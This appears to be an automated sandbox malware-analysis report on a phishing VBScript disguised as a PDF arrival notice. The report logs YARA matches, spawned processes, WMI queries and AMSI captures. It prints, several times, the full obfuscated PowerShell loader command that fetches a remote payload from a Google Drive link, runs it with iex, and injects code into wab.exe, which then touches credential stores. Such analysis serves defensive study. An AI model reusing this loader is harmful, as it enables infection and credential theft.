            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

            System Summary

            Source: amsi32_8108.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Initial file: Unperiphrased.ShellExecute Coinsurable,maengdebegreb,"","" ,Allness139
            Source: Arrival Notice PUS_pdf.vbsStatic file information: Suspicious name
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6253
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6253
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
            Source: Arrival Notice PUS_pdf.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi32_8108.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/9@5/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Australians.Hov
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_el1m15uv.qqi.ps1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7660
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8108
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Arrival Notice PUS_pdf.vbsReversingLabs: Detection: 13%
            Source: Arrival Notice PUS_pdf.vbsVirustotal: Detection: 15%
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, gpapi.dll, cryptnet.dll, iphlpapi.dll, winnsi.dll, winhttp.dll, ondemandconnroutehelper.dll, mswsock.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, cabinet.dll, wbemcomn.dll, propsys.dll, windows.storage.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, userenv.dll, sspicli.dll, ntmarta.dll, esscli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, windows.storage.dll, wldp.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wbemcomn.dll, amsi.dll, userenv.dll, rasapi32.dll, rasman.dll, rtutils.dll, dhcpcsvc6.dll, dhcpcsvc.dll, secur32.dll, vaultcli.dll, wintypes.dll
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007872000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007807000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000009.00000002.2003068899.0000000003320000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Klervske = 1;$Hengivnes='Substrin';$H", "", "", "0");
            Source: Yara match File source: 0000000C.00000002.2627141009.0000000004605000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.2017391660.0000000009585000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.2017192523.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.2007819028.00000000061C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nazaritism)$global:Overslack = [System.Text.Encoding]::ASCII.GetString($Vvets)$global:Burnfire=$Overslack.substring(305706,29961)<#Projektgruppe Hundrede Constraints Nonterritorially
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Trflerne $Memory $Gyratorkoblede), (Underlagt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tikkenes = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sweepsteaket)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Blennophthalmia82, $false).DefineType($Wrapp
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nazaritism)$global:Overslack = [System.Text.Encoding]::ASCII.GetString($Vvets)$global:Burnfire=$Overslack.substring(305706,29961)<#Projektgruppe Hundrede Constraints Nonterritorially
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF886E40952 push E95B7BD0h; ret 3_2_00007FF886E409C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_07B70638 push eax; mov dword ptr [esp], ecx 9_2_07B70AC4
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF8039 pushfd ; retn 0027h 12_2_02EF803A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF0CB5 push edi; ret 12_2_02EF0CC2
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF0C93 push edi; retf 12_2_02EF0C3A
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
